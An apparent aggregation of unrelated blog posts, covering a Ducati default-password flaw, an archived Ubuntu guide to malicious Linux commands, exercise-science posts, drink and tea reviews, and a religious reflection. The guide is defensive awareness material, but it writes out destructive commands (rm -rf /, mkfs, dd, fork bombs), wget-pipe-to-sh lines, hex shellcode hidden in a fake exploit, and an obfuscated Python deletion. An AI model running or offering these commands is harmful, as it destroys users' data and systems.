Ducati Motorcycle Default Password Vulnerability.

There's an interesting vulnerability writeup at osvdb.org detailing how to gain unauthorized access to a Ducati Motorcycle using the default ignition password.  Apparently by default the ignition password is set to the last 4 digits of the motorcycle's VIN number.

Guide to Malicious Linux/Unix Commands

UbuntuGuide.org has an excellent guide to Malicious Linux/Unix Commands which may be observed on live systems or honeypots.

Not only is it a good idea to monitor logs for attempts at using these commands, but it may also be a good idea to test your honeypot (especially if it's a virtual machine) to see if these commands will damage/destroy your honeypot.

Below is a current copy of the guide.  It has already dissapeared from the Ubuntu forums, so I felt it would be a good idea to archive "just in case".



This article was originally published in Ubuntu Forums but has recently been removed there. Ubuntuguide feels that knowledge about these risks is more important than any misguided attempts to "protect the public" by hiding their potential dangers or protect the (K)Ubuntu/Linux image. The original article has therefore been re-created (and subsequently edited) here.)
ATTENTION:
It is worthwhile to have some basic awareness about malicious commands in Linux. Always be cautious when running one of these (or similar) commands (or downloaded scripts) that have been "recommended" as a solution to a problem you may have with your computer.

It is also worthwhile to always enable a screensaver with a password so that a casual passerby is not able to maliciously execute one of these commands from your keyboard while you are away from your computer.
When in doubt as to the safety of a recommended procedure or command, it is best to verify the command's function from several sources, such as from readily available documentation on Linux commands (e.g. manpages).
Here are some common examples of dangerous commands that should raise a red flag. Again, these are extremely dangerous and should not be attempted on any computer that has any physical connection to valuable data. Many of the commands and techniques will cause just as much damage from a LiveCD environment, as well.
This is far from an exhaustive list, but should give some clues as to what kind of things people may try to trick you into doing. Remember these can always be disguised as some obfuscated command or as a part of a long procedure, so the bottom line is to take appropriate caution when executing something that just doesn't "feel right".

Delete all files, delete current directory, or delete visible files in current directory

It's quite obvious why these commands can be dangerous to execute. rm means remove, -f means "force" deletion (even if write protected), and -r means do it recursively, i.e. all subfolders. Therefore, " rm -rf / " means force a deletion of everything in the root directory and all subfolders. " rm -rf . " means to force deletion of the current directory and all subfolders. " rm -rf * " means to force deletion of all files in the current folder and all subfolders.
rm -rf /
rm -rf .
rm -rf *
Another variation of this, which would all force deletion of the current folder and all subfolders, would be:
rm -r .[^.]* 
which will only exclude the parent directory ".."

Reformat Data on device

Whatever follows the mkfs command will be destroyed and replaced with a blank filesystem.
mkfs
mkfs.ext3
mkfs.anything

Block device manipulation

These commands cause raw data to be written to a block device. Often this will clobber the filesystem and cause total loss of data:
any_command > /dev/sda
dd if=something of=/dev/sda

Forkbomb

Although perhaps intriguing and curiosity-provoking, these commands execute a huge number of processes until the system freezes, forcing a hard reset of the computer (which may cause data corruption, operating system damage, or other awful fate).
  • In Bourne-ish shells (like Bash):
:(){:|:&};:
  • In Perl
fork while fork

Tarbomb

Someone asks you to extract a tar archive into an existing directory. This tar archive can be crafted to explode into a million files, or can inject files into the system by guessing filenames. You should always decompress tar archives to a clean directory with nothing else in it. Only after determining that the extracted files are what was expected should the extracted files be copied to the final target directory.

Decompression bombs

Someone asks you to extract an archive which appears to be a small download. In reality it's highly compressed data and will inflate to hundreds of GB's, filling your hard drive. You should never download and extract any data, utility, or software from an untrusted source.

Malicious code in Shell scripts

Someone gives you the link to a shell script (executable from the command line interface using script execution command ./ ) and recommends that you download and execute it. The script might contains any command whatsoever -- whether benign or malevolent. Never execute code from people you don't trust. Examples:
wget http://some_place/some_file
sh ./some_file
or
wget http://some_place/some_file -O- | sh

Malicious source code to be compiled then executed

Someone gives you source code then tells you to compile it. It is easy to hide malicious code as a part of a large wad of source code, and source code gives the attacker a lot more creativity for disguising malicious payloads. Do not compile or execute the resulting compiled code unless the source is some well-known application obtained from a reputable site (i.e. SourceForge, the author's homepage, an Ubuntu address).
A famous example of this was code that surfaced on a mailing list. It was disguised as a proof of concept "sudo exploit". It was claimed that if you ran the code, sudo would grants root privileges without a shell (which is what the commands gksudo and kdesudo are for). In the downloaded code was this malicious payload:
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
To the new or even somewhat experienced computer user, this looks like the "hex code gibberish stuff" that is so typical of a safe proof-of-concept. However, this actually runs
rm -rf ~ / &
which will destroy your home directory as a regular user, or all files if you are logged in as root. If you were able to recognize commands in hex string format, you would already be such an expert user that you would never run such untrusted code. But for the rest of us, we must remember that malicious code comes in many novel forms -- be wary about installing code that you know nothing about and the source of which you don't absolutely trust.
Here is another monstrous example (in Python) that no self-respecting programmer or user would ever execute:
python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'
in which "sn!.sg!+" is simply the rm -rf * command shifted a character up in order to disguise it from casual examination. I wouldn't expect anyone with experience in Python to be foolish enough to paste this monstrous thing into their terminal without suspecting something might be wrong, but how many casual users are fluent in Python?

HIITing Diabetes With the Hammer: 20min of Low-Volume High-Intensity Interval Training is Enough! + Metabolic Benefits and Optimum Interval-Format for Healthy People!

Figure 1: Number [in millions!] of prediabetics and diagnosed and undiagnosed diabetics in the USA according to data from the American Diabetic Association from January 2011 (ADA. 2011)
You probably remember Wednesday's news-item on high-intensity interval training (HIIT) for cardiac patients - as it turned out, even 2 weeks after myocardial infarction our central pump needs real exercise to get back in, or to get into even better shape. Today, I do yet want to go beyond infarction patients and address another, ever-growing sub-group of the self-perceived "victims" of the obesity pandemic, the type II diabetics.

About a month ago, J.P. Little and his colleagues from the University of British Columbia Okanagan published a study in the Journal of Applied Physiology (Little. 2011a), the results of which confirm (once again) the unpopular hypothesis that getting your ass off the couch in order to work it off in the gym hard (!) is the only way to treat a (largely) self-induced health condition that is plaguing 8.3% and threatening another quarter (79 million people with pre-diabetes) of the US population (ADA. 2011, cf. figure 1).

In the Little study (pun intended ;-), it took 8 type 2 diabetics no more than 60 minutes of intense exercise at 90% of their maximal heart rate (+another 60 minutes of rest in between intervals) to
[...] rapidly improve glucose control and induce adaptations in skeletal muscle that are linked to improved metabolic health
120 minutes (!) of which only 60 were spent doing 10x60s intervals on a cyclometer brought about changes, no pharmaceutical (or even supplement) will ever produce (without significant side effects). 120 minutes spread across 6 exercise sessions in the course of two weeks, i.e. 3 sessions of 20 minutes per week - probably 20 minutes the majority of the 8 overweight (BMI 32.6kg/m²) diabetics would otherwise have spent on their couch in front of the TV, or - with comparably small benefit - trampling away at 65% of their VO2Max on a recumbent bike. With intervals at 90% of their maximal heart rate, however, the
[...] average 24-h blood glucose concentration was reduced after training (7.6±1.0 vs 6.6±0.7 mmol/L) as were the sum of the 3-h postprandial areas under the glucose curve for breakfast, lunch and dinner (both p<0.05).
More importantly, though, HIIT training set the stage for future improvements by improving the capacity of the trainees mitochondria to handle / burn nutrients, with the >3.5x increase in GLUT-4 acticity indicating a profoundly increased capacity for glucose uptake and the +20% increase in citrate synthase activity indicating an increased capacity for substrate oxidation (energy usage) in the cellular power plants of the 8 diabetics (cf. figure 2).
Figure 2: Improvements citrate synthase, protein content of 70kDA subunit, complex III core 2 protein, complex IV subunit IV, mitofusion 2 and Glut-4 activity - all markers of mitochondrial capacity / efficiency - after 6 sessions of 10x60s cycling at 90% HRmax in 8 diabetic patients (data calculated  based on Little. 2011a).
These improvements, and this is a result from a previous study by Little's group (Little. 2011b), were - at least in part - a result of the effects HIIT has on mitochondrial biogenesis, of which Little et al. found that it is profoundly elevated in the first 24h after the exercise bout (3h post: +70% nuclear PGC-1alpha/Tubulin, 24h post: +60% whole muscle PGC-1alpha/Tubulin; +150% increase in p-p38MAPK) - and all that after a single session of a all 4x30s all-out Wingate cycling tests separated by 4 min of rest).

Now, let me ask you: Do we really ask too much of our fellow (and mostly ridiculously lazy) human being, if we ask them to invest one hour of their life per week to exercise into a, no, their healthier future? I wouldn't think so!

Figure 3: Fat oxidation in kJ per minute during 60 min of cycling at 60% VO2Max before and after 7 sessions of HIIT training in eight healthy, normal-weight recreationally active women (Talanian. 2006).
Metabolic benefits of HIIT training: Now, you may well ask yourself, why you should a give a damn about those changes, well... would it convince you, if I told you that in a 2006 study Talanian et al. were able to show that after 7 sessions of serious HIIT training (10x4 min at 90% HRMax with 2 min rest between intervals) the amount of body fat the eight female study participants burned during cycling at 60% of VO2Max was increased by 36% (Talanian. 2006)? in other words, the HIIT sessions primed the bodies of the "recreatinally active women (22+/-1 yr old, 65.0kg body wt, 2.36l/min VO2peak) to burn more fat during subsequent cycling at the lower end of the "fat-burning zone"! As the data in figure 3 shows, this effect was partly, because the subjects switched more readily into "fat burning mode" - a priming effect from the HIIT sessions.


HIIT, yeah... but how to find the right dosage?

Both the Moholdt, as well as the Little study have shown that it does not take much to induce profound health benefits - but what would be the optimal dosage for YOU, who, as a diligent student of the SuppVersity, are probably (or should I say hopefully) neither an overweight diabetic nor a cardiac patient?

Figure 4: Changes in body weight, body fat (%), peak lactate levels, perceived exertion (RPE) and VO2Max (rel. to body weight) after low intensity continuous training or three different HIIT protocols in recreational cyclists (data calculated based on Seiler. 2011)
Apparently, a group of scientists from Kristinsand (again in Norway, where the descendants of the Vikings obviously are tough enough fore real exercise ;-) asked themselves the exact same question (Seiler. 2011). In the course of a 2 months study they had 29 male and 6 female recreational cyclists, whose VO2Max of 53+/-6 ml*kg/min were ~56% higher than those of the cardiac patients (after the intervention) in the Moholdt study, perform 2 HIIT sessions per week (plus 2-3 weekly low-intensity bouts) of one out of three different interval training programs: 4x4min, 4x8min, or 4x16 min at 94%, 90% or 88% of their respective maximal heart rates.

Hard, but neither torturous, nor time consuming

The results, I have plotted in figure 4, confirm that HIIT must be hard, but neither torturous nor time-consuming. Or as the scientists put it:
The 4x8 min prescription induced greater physiological adaptation than both lower and higher intensity interval programs of 64- and 16-min total duration but was perceived as less stressful than 4x4 min at ~95% HR max . These findings suggest an important interaction between accumulated work duration and work intensity that can be optimized for inducing maximal physiolo gical adaptations at manageable RPE [rates of perceived exertion] in endurance athletes performing interval training.
Image 1: Spinning at ~90% of your max heart rate
would be one way to do 4x8 intervals.
On that note, it may also be interesting that in line with the +91% increase in time to exhaustion Seiler et al. observed in the 4x8 HIIT group (vs. +12% in low intensity and +62% and +63% in 4x16 and 4x4 HIIT programs) and the increased respiratory exchange rate Moholdt et al. observed in their study (cf. Wednesday's news), A.D. Hafstadt and his colleagues from the University of Tromsoe (Hafstadt. 2011) have found in a mouse-model (where cutting out the heart and measuring its weight obviously is not so much of an issue as it would be with human subjects ;-) that despite similar increases in the heart to body weight ratio (+10%), ...
[...] only HIT altered cardiac substrate utilization, as revealed by a 36% increase in glucose oxidation and a concomitant reduction in fatty acid oxidation, [...] improved cardiac efficiency by decreasing work-independent myocardial oxygen consumption and increased cardiac maximal mitochondrial respiratory capacity.
These findings lead the scientists to conclude that "high intensity training is required for induction of changes in cardiac substrate utilization and energetics" and that these improvements may be at the heart (pun intended) of its "superior" ability to increase aerobic capacity - or as, I previously phrased it: HIT, not steady state aerobics, is real cardio training! You would not train a 20inch biceps with blue 2pound sand-filled plastic dumbbells, would you? I think, I will leave it on that, for today and wish you all have an intense weekend (whatever your interpretation of that may be ;-)

Image 2: There is no one-size-fits-it-all HIIT training.
Addendum of 10/01/2011: In the comments area, Oni posted a quite resonable question: "Doesn't HIIT usually employ shorter (1min) intervals? And how could 8 minute intervals, as in the Seiler study be feasible?" The answer to the first question is easy, as we just have to look at the words "high intensity" and "interval training", now obviously no one questions that the regimen Seiler et al. used, had a high intensity (90%) and employed intervals - and I think Oni does not disagree on that, but rather implies that this type of training is too intense and if the subjects had not been recreational cyclists, this could actually have been the case.

On the other hand, the results of the Seiler study also showed that shorter intervals at higher intensity lead (in this subject group) to greater rates of perceived exertion. Now, I dare say that 95% of the trainees who are doing the standard ~1min bouts of all-out exercise - are not going "all out" in the sense that they are scratching their real heart rate max. If they did, I am quite sure they would (in line with the results from the Seiler study) confirm that 8min @90% did not wear them out as much as 1min @100% of ALL OUT exercise at their  max. heart. This leaves the question to be answered, whether 4 intervals à 8 minutes are optimal for everyone? And this is fortunately a question that is easy to be answered... 4x8 is obviously for "advanced" athletes (who have been practicing some type of endurance activity already). From my training experience, I know that untrained (or less trained) trainees sometimes do not even reach "target heart rates ~90%" before they feel so exhausted that they give up.

Image 3: The type of equipment you are using will also have an influence on optimal interval length; doing 8-min all-out intervals on the treadmill certainly are no viable option - even not for highly trained athletes!
So what does that mean for your training, then? If you like doing the all-out (! don't forget to push yourselves!) 1-minute intervals, keep doing them. There are plenty of studies that confirm similarly beneficial effects on mitochondrial biogenesis with these protocols, e.g.
If, on the other hand, you are an (endurance) athlete wanting to improve your performance, the available data would suggest that intervals in the +4min range would be the way to go (Seiler. 2004; Driller. 2009; Seiler. 2011), as they are more sport-specific. Overall, it is yet always about balancing duration (individual interval length + number of intervals + rest days in-between) vs. intensity (heart rate) to find your optimal HIIT protocol (Gross. 2007; Zuniga. 2011)

a quick week in review


We've been working on the garden for a few weeks. We have plans on covering it with river rocks, and planting shrubs and ornamental grasses. So far, it looks great! We have since covered it, and probably won't do the rocks until spring. Sadly, we only have 1/3 of the garden done. 1/3 will eventually be small garden boxes for my much smaller garden. We decided after 13 years that we just can't maintain a garden this size. We also calculated the amount of time and effort it takes to grow 3 tomato plants and really, it's cheap to just buy the tomatoes. 
 We also had our 2nd Crafts for the Homebound this week. We made Halloween wreaths. I can't wait to hang mine up and start hauling out the rest of the Halloween decorations. And yes, one button is pink, I don't know how that happened.
 After years of searching for the perfect camera bag, I think I am done. I have a Shootsac, which is great for shooting, and a Crumpler, which is great for travelling, but I wanted a purse that had enough protection to throw my camera, but didn't scream "camera bag". I wavered between this and an epiphanie bag, but the cost of the bag and the shipping was too high for me. I considered the fact that neither bag was leather, and I read mixed reviews, but after seeing one in person, I knew this bag was the one I wanted. And I got the yellow one! The colour mom said 'we' should never wear. I love it. It holds all my camera equipment, or a camera and a bunch of other purse filler stuff. But what I love the most is that it has a shoulder strap. I have the padding to turn any purse into a camera bag but most purses available right now don't have shoulder straps. I think it says something too that when I unpacked the bag, Kerry said "How much was this?" I think it was because he expected it to be more than it was.
We are taking the truck and camper on it's maiden voyage this weekend. (the first one as our truck and camper.) I was pleasantly surprised to find that I didn't need to pack our existing camping supplies into the camper. It still holds everything from when Grandpa used it, like vintage Corelle dinner ware. They don't make it like they used to. Not a chip in any of it, unlike our 2 year old Corelle set that has a chip out of every.single.plate. We also plan on taking the big dog with us, which in itself will be an adventure, I'm sure. 

Review for Go Fast


CAFFEINE CONTENT

182 mg

EASE IN ACQUISITION—4

While easier to come by than most other products the company produces, you still may have to look around a bit to find it.  Just be patient, and you’re bound to come across it eventually.

APPEARANCE/PRESENTATION—8

The appearance is relatively standard—lots of red with diagonal logo front and center—but still different enough to ensure that it won’t be overlooked.  A nice touch is the gold emblem certifying its approval by the American Masters of Taste.  However subjective a factor taste may be, the seal itself is quite enough to pique one’s curiosity (now the question is…to get the seal, does one need to actually taste good, or do they just buy the American Masters of Taste out?), as evidenced by my purchase.

TASTE—6

With the seal on the can in mind, I took a swig, and…I don’t know what to think.  It’s unique to be sure, but it is one of the strangest drinks I’ve ever tasted.  There is a taste and sweetness that reminds me of honey (no surprise there; it’s the first ingredient listed on the front of the can), a tartness that reminds me of lemon, and a cooling effect in my mouth and throat after the fact that reminds me of mint…so, maybe carbonated honey, lemon, and mint tea?  I’m going to just say grab a can and try it, decide for yourself what it is and how you feel about it.  I’m still at the point where I’m not sure about either.

KICK (INTENSITY) —8

Leaving the thoroughly strange taste behind, Go Fast delivered a heck of a pick-me-up.  There were some very mild jitters, but mostly I just felt very clear of head and very lucid.  If only for that effect alone, it’s an experience worth buying the can for.

KICK (DURATION) —8

We’ve established that Go Fast will make you do just that, and once you’re going, you will be for hours.  The post-energetic period was uneventful, with no crash worth remembering.

THE DRINK OVERALL—7

I very much liked the kick Go Fast provided, it’s just the taste that I’ve taken off points for, and that only because I really have no idea what to make of it.  I’m going to give my recommendation if any out there would like to give it a shot; as for myself, I’m going to get a few more reviews taken care of and maybe give Go Fast another shot after that.  I’d really like to see how I feel about the taste a second time around.


KEYWORDS: Go Fast Energy Drink review, stronger for longer, sports energy drink

Review for Jolt Orange Blast


CAFFEINE CONTENT

186 mg

EASE IN ACQUISITION—2

As with all Jolt products in the battery can (except the cola), this one’s been discontinued.  Looking to try it?  Good luck finding it.

APPEARANCE/PRESENTATION—7

The battery can idea is cool, even if it’s a little plain looking.  As with the other cans of the line, it feels very comfortable in one’s hand.  Not 100% certain why it’s so notably so.

TASTE—6

Out of all the discontinued Jot beverages, this is the one I like the most, though I wouldn’t say that I love it…not by a long shot.  It’s got a pretty potent medicinal aftertaste, and the balance between the sweet and sour of the orange flavor is pretty subpar, but still, I could still get it down without having to take breaks for the sake of my gag reflex or wince every time I take a swig.

KICK (INTENSITY) —8

I didn’t find the kick to be out-of-the-ballpark awesome, or especially unique in terms of effect.  This said, it still performed admirably, placing me at a point where I was more substantially awake than especially jittery.  Which is a nice place to be.  Sometimes.

KICK (DURATION) —8

I found the extent of effectiveness to provide an experience similar to that I had with Jolt Passion Fruit—long-lasting peak, with a quick tapering off at the end.

THE DRINK OVERALL—7

Well, the drink’s discontinued (or at least this variant has been), but really, you aren’t missing a whole lot.  The taste is so-so and the kick is decent.  How many other drinks are there out there that are like that, though?  Or better?  My answer: plenty.  If you missed your chance at it, move on unless you’re desperate, in which case I suggest keeping an eye out for it on eBay.  Otherwise, put off the ashes of mourning and find a better beverage.  There are plenty of ‘em out there.


KEYWORDS: Jolt Orange Blast review, battery can, discontinued

Adelfo Cerame - Pre-Contest-Prep: Rest, Recovery and the Underestimated Value of Taking a Week Off.

Image 1: If this is how you feel, than it is about time you take one week off from whatever routine you are on.
It's only Thursday and I feel like I could use an extended weekend (luckily this will be one, with Monday being a holiday, here in Germany ;-), already. Some feel like it's life or work that is getting in their ways, for others its their hobbies, like blogging and training (that's me ;-), but, after all, if we are honest with ourselves, in almost all cases there is "no one" or "nothing" that really stands in our way, other than we, ourselves. I mean, oftentimes we are so busy with our everyday routines that we begin to feel to be externally controlled, although, in almost all cases, we are the ones who decide / believe that we must follow the exact same routine day in and day out.

The results of this practice, in the best case, are boredom and discontent - in the worst case, however, our routines will burn us out and make us sick. Adelfo, our man at the  2012 Wheelchair Nationals, is well aware of the fallacy of routines - especially when it comes to going to the gym day in and day out and he knows that taking a day off before you feel it is utterly necessary is way smarter than digging a whole out of which you cannot escape, no matter how "hard" you rest ;-)

One Week Out = One Week Off

I'm taking a week off from training, before the hot phase of my contest preparation begins. The time, this stands out of question, is well spent to heal my nagging pains, to rest my body, who has already been sending me the first signs of a cold and, most importantly, to be able - mentally as well as physically - to really kickstart my contest preparation in October.
Image 2: Comparison shots from September, 1st to September 21 2011 - the prep has not yet begun, therefore no major changes in this time of experimentation (photos by Adelfo Cerame, 2011)
As it happens, I am also just reading Rob Regish's Blueprint. In his book, Regish mentions that a depressed immune system, and subsequent infections, like if you're getting a cold out of nowhere are tell-tale signs that is is about time to take a week off from training... Now, while this idea obviously was not new to me, reading it black (or should I say blue ;-) on white, from someone with Robb's years of experience in training people, and as one among a whole host of other valuable tips, really helped to put me at ease with my decision to take the week off... Let's be hones, I assume for many of you it won't be different: we are always hesitant to just stay at home lying lazy on the couch, when we "ought" to be in gym. For some its the fear to gain fat, for other's (as myself) it's because we are afraid to lose some of the muscle we have been working so hard for over the past weeks, months and years. And this fear haunts us, although we all "know" (our brain knows, but our hearts don't) that all we will lose (if anything) is some easily replenishable muscle protein, i.e. there won't be any substantial loss of muscle mass, the muscles will only lose some volume.

"You should always listen to your body!"

Well, I guess you will have heard this verdict before "listen to your body" - but what if your heart, certainly a part of your body, cries - "I am afraid I could lose muscle!" and it cries so loud that you can hardly hear the your aching muscles under the pain of weeks and months of continuous training. Now, what can your do? I guess, the best thing will be to advice your brain to tell your heart to shut up and rest. At least that is what I decided to do and to take my mind off the issue of losing muscle or getting fat, I am sitting down and getting the plan for my contest preparation stream-lined. I am planning my workouts (and off times !), sketching the meals I will be eating and deciding on which  the foods that will make up the majority of my diet in the next 4-5 months.

"Rest appropriate nutrition" - cutting back carbs, when you don't need them

Image 2: Healthy post-workout meal of the week - 7oz raw wild caught salmon, 12oz sweet potatoe, 6 carrots, 1c mangoes, 1 tbs raw blue agave and some refreshing coconut milk - the all natural sports beverage!
A pros pos nutrition, I am still fasting 16 hours and feeding for 8 hours, but during my off week all my meals are high in protein and fat and low in carbohydrates. Examples would be ...
  • raw milk, carrots and raw cheese, or 
  • raw/seared steaks / sashimi with carrots or fruit and coconut oil, or
  • raw wild caught salmon from image 3, but without the sweet poatoe 
Basically a high quality protein source + some additional fat (if the former is not high in fat) + a minimal amount of carbs from veggies or fruit. I must admit that I still sneak in a meal from time to time, but this is partly psychological, because I know that this is the last week I can to it without messing up my contest prep, where I have already planned on the three days were I will deliberately "break" my diet:  thanksgiving, christmas and my birthday... and even those will be pre-planned refeeds.

Refeed? I guess you have already been waiting for this keyword to occur. After all, I promised you to report on my experience with a fruit based refeed... Well, I gorged on fruits just as I would have done with pancakes and the processed carbs that I usually eat on my re-feeds, and... I would have to say that even though I stuffed myself with fruits I did not get that comatose or sick feeling that I usually get, with the crappy foods from the grocery store. While I am still not a 100% sold on the idea, I am toying with the idea to start out my prep with fruit-based refeeds. We will see whether this will be sustainable, once I start getting leaner... for now, it works fine, though.

Adelfo Cerame's personal blueprint: Mens sana in corpore sano

Video 1: Adelfo does single arm cable rows 2 weeks before the hot phase of his contest preparation.
As far as my training is concerned, I have been toying back and forth with some of the suggestions from Regish's Blueprint. I've been reading the whole book on the past weekend and am still in the process of sorting out those training principles of which I think that they make a valuable addition to my routine. Don't get me wrong, the book is awesome, but if there is one thing I have learned in the past, then this is never to copy a routine from someone else to a T. Yet despite the fact, that there are some profound differences as far as the nutritional protocol is concerned (this is quite obvious, as the book outlines a muscle building not a contest prep diet), I really do like the weight training protocols and I hope to find a way to combine my constantly evolving contest prep diet with some of the training strategies from Regish's Blueprint...

I will also try and use my week wisely to do some meditating, soul searching and spend some time with the Lord, as I like to be spiritually healthy just as I am physically healthy. And, in case spirituality is not for you and you do not feel like taking a week off, anyway, you may want to check out the promised training video (video 1), head to the gym and treat yourself to a large portion of wild-caught salmon with delicious sweet potatoes and some carrots (cf. image 2) ;-)

2005? Haiwan Lao Tongzhi Sheng Bing (wet stored)

"Lao Tongzhi" (老同志) can mean one of two things: "old comrade", as intended by this brand name, or "old homosexual", in Chinese slang. I would really like to make a pu'er cake under the brand "Old Homosexual" and have a pic of Rip Taylor smiling, perhaps confetti would dot the paper. I don't think the Chinese would get it, though.
I think it could work, no?

This sample comes to me courtesy of MarshalN, whom I begged for a sample because I happen to own a similar cake from the year before. I wanted a glimpse into the future. The moldy future, as per the frosty leaf below:

2005 Haiwan Lao Tongzhi Sheng Bing (Traditional Storage) - dry leaf

This traditionally stored tea went through its time at a wet storage warehouse, and its release into the market is perhaps premature. Generally, these teas are wet stored for 2 years and then aired out for another long period, perhaps as much as 6 to 10 years or more. 2005 plus 2 is 2007, plus 6 is 2013. But here it is, our little premie, forced into our world still frosted with mold.

In 2005, this cake was known for being a punch-you-in-the-mouth (ow!) sheng pu, powerful, bitter, complex, and with a long aftertaste. And now...?

2005 Haiwan Lao Tongzhi Sheng Bing (Traditional Storage) - brewed

The first two infusions are mostly mold taste, with some tea flavor appearing when cool. The more interesting flavors appear thereafter, but with the mold taste ever-present above them. It's strong but more like a slap (I demand satisfaction, sir!) than a punch, to keep my violent metaphor going. The "soup" is nicely thick and the aftertaste and afteraroma are decently long. It even lingers at the root of the tongue.

It pleased me to see this tea change into something drinkable and enjoyable, moldiness aside. It would do better with drier storage, and so I'm looking forward to tasting mine again soon to see how it compares.

2005 Haiwan Lao Tongzhi Sheng Bing (Traditional Storage) - brewed leaf

From the brewed leaves as pictured above, it seems the storage was not too wet; the leaves have not carbonized, and they retain their tenderness and flexibility.

A Perfect Pattern


[images via STYLE.com]
I could write a frothy description of this collection, but instead I'm simply going to say go onto Style and view the collection yourself. After underwhelming collections by several of my favorite designers (Proenza Schouler, Prada) I am pleased that Dries has not let me down. Everything about this runway presentation was flawless.

HIIT is the Hit! Interval, not Steady State Aerobics is the Way to Go - Even for Patients with Myocardial Infarctions!

Image 1: Right in the starting block is where heart health begins... and on the finish line of a marathon race probably is where heart health ends (if not much earlier)
I think it is unnecessary to pose this question again, but in case you missed the innumerable blogposts, where I asked you whether you would rather like to look like an ultra-endurance runner or like a sprinter - here you go: Whose physique would you rather want to have? The sinewy physique of Haile Gebrsellasie or the muscled physique of Usain Bolt and co? I assume in most cases this question is unnecessary... but what if you are sick, obese or even have a heart failure? Obviously you cannot train like a sprinter, then... can you? Yes, you can - at least within your personal physiological limitations! In view of the results of a recent study from the KG Jebsen Center of Exercise Medicine at the Norwegian University in Trondheim, Norway, aerobic interval training would even be the healthier choice (Moholdt. 2011)!

For their study Trine Moholdt and her colleagues recruited 107 patients who had been hospitalized for myocardial infarction 2-12 weeks before the study and randomly assigned them to usual care rehabilitation or an aerobic interval training performed. In the course of the 12 week study period the exercise protocol was performed thrice a week. Two sessions were supervised, the other one had to be performed at home.
  • usual care rehabilitation program - the standard program comprised 60 minutes of aerobic exercises performed to music; the sessions were lead by a physiotherapists, and after a 10-minute warm-up, the patients did aerobic exercises like walking, jogging, lunges and squats for 35 minutes, which were followed by a 5-minute cool-down with stretching and relaxation exercises.
  • aerobic interval training - the total session time of the interval training was 38 minutes; it consisted of an 8-minute warm-up, followed by 4x4-minute intervals at 85–95% of the maximum heart rate (monitored by heart rate monitor), with active rest of 3 minutes of walking at 70% of maximum heart in between the intervals; the exercise session was terminated with a 5-minutes cool-down.
In view of the still commonly held believe that interval training could easily become (over-)exerting, quite a few medical practitioners, would probably shake their heads over the "irresponsibility of [their] Norwegian collegues - how dare those idiots put ailing cardiac patients on such an tortorous exercise regimen" ... I think I won't have to continue, you know the whole litany... and if you, just like me cannot stand that anymore, and your own (your father's, mother's, grandpa's or grandma's) doctor is one of those, take the following data, print it and use it to shut him up.
Figure 1: Improvements in VO2Max, peak heart rate, respiratory exchange rate at peak heart rate and heart rate recovery in cardiac patients after 12 weeks on the usual care rehabiliation program or an intense aerobic interval training (data calculated based on Moholdt. 2011)
Obviously, the poor cardiac patients did not only survive the "torture", their hearts even thrived on it. The increase in peak oxygen uptake (VO2Max), the standard measure of aerobic performance, was 2.7x higher in the interval group than in the patients who did the usual 60-minutes reha-sessions (cf. figure 1). For the other parameters the differences were not statistically significant after analysis for initial randomization:
Flow-mediated vasodilatation, both non-normalised and normalised to shear stimulus, increased significantly after exercise training in both groups [...] Quality of life increased significantly after exercise training (between-group differences, not significant)
If we look at the blood parameters, however, we do yet see some interesting differences, even your medical practitioner could not argue away:
Figure 2: Changes in high density lipoprotein and adiponectin in cardiac patients after 12 weeks on the usual care rehabiliation program or an intense aerobic interval training (data calculated based on Moholdt. 2011)
While the changes in triglycerides, CRP, ferritin, haemoglobin, and glucose were - within their respective standard-deviations - identical in both groups, there was a marginal but statistically significant greater improvement in high density lipoprotein (HDL) levels (a statistician would say there was an improvement in the interval group, while there was none / no statistically significant one in the reha-group) in the interval group. While this would indicate a lower risk of future (recurrent) heart disease, the accompanying  increase in adiponectin would suggest that the interval training group either had already or were about to lose more body fat than their endurance trained peers.

Unfortunately, the body composition of the patients was not tracked in the study, so this leaves us with the "surprising" benefits of intense interval training for the hearts of patients with prior myocardial infarction as the main result of a study some medical practitioners would probably not even have dared conducting.

"Listening" to a Password Cracker

I used the P22.com Music Text Composition Generator to create music using attempted usernames and passwords I gathered during just one cracking attempt at my honeypot.  The music is recorded at 2400 BPM using Lead 8 (bass + lead).
I feel the music has an electrifying video game feel to it.  The purpose of this video is to raise online security awareness.  I hope you enjoy it!


YouTube Link

Rosh Hashanah - what does it mean??



While all Jewish Holidays commemorate something specific to the Jewish people i.e., Passover - the exodus for Egypt, Shavuot, the giving of the Ten Commandments etc. the High Holiday of Rosh Hashanah is commemorating the creation of man. This is not something specific to the Jewish people but for all of humanity.


On the sixth day of creation 5772 years ago, when G-d made man – and incidentally according to the Bible, this human being was a man and woman creation joined at the hips, the Bible describes this day as the beginning of G-ds accomplishments in the world. Six days already went by, the heavens, planets, animals, trees etc where created, and yet, only when the human being was made, did G-d consider, finally things are starting to happen.

The purpose of creation, and the reason for everything else, was only a prelude to the creation of the human race as the Bible says, when Adam proclaimed on that first Friday, “let us all bow and prostrate before G-d who made us” that is when “the Lord was king, he garbed himself in grandeur…… he (finally) established the world firmly”. The universe was complete, and the Sabbath was ushered in.


This is the central theme of Rosh Hashanah, coronating G-d as our King and we as His subjects.


The great mystics tell us that once a day is imbued with certain energies, this occurrence repeats itself and renews itself every year that this day is relived all over again.


On Rosh Hashanah we are contemplating on the very special role we human beings have in the scheme of what takes place in the Universe. Everything in our world was made to serve us human beings and depends on us. G-d waits for us to recognize his sovereignty, and with that permission, He works with us at our side, “G-d is your shadow.” This is our very special power and responsibility as the principle reason for creation.


When G-d made the world, He made all the planets in one command. All the animals in one gesture, all the vegetation at one time. When it came to making the human race, G-d made one person. The whole world, including G-d, is looking to each individual person as if there was no one else, to make that difference.

The only creatures endowed with a mind to think of themselves and of their lives in third person, something that a stone or a tree or an animal is not able to do, is the human being.


